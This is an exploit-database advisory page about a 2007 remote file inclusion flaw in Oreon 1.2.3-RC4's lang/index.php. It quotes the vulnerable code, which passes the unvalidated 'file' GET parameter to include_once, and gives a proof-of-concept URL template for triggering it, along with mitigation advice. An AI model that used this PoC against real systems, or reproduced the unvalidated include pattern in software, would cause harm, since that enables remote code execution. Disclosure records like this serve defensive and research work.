header-logo
Suggest Exploit
vendor:
Not provided
by:
Dr Max Virus
7.5
CVSS
HIGH
Code Injection
94
CWE
Product Name: Not provided
Affected Version From: oreon-1.2.3-RC4
Affected Version To: Not provided
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

Script:oreon-1.2.3-RC4

The vulnerability exists in the 'lang/index.php' file of the Oreon version 1.2.3-RC4 script. The issue is caused by the lack of proper input validation, allowing an attacker to include arbitrary files via the 'file' parameter in a GET request. This can lead to remote code execution.

Mitigation:

The recommended mitigation for this vulnerability is to apply the latest patch or upgrade to a newer version of the script.
Source

Exploit-DB raw data:

------------------------------------------------------------------------------------------------------------------------
Script:oreon-1.2.3-RC4
Downlaoad:http://www.oreon-project.org/
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lang/index.php)
Vul Code;
if (isset($_GET["file"])){
	include_once($_GET["file"]);
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lang/index.php?file=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-17]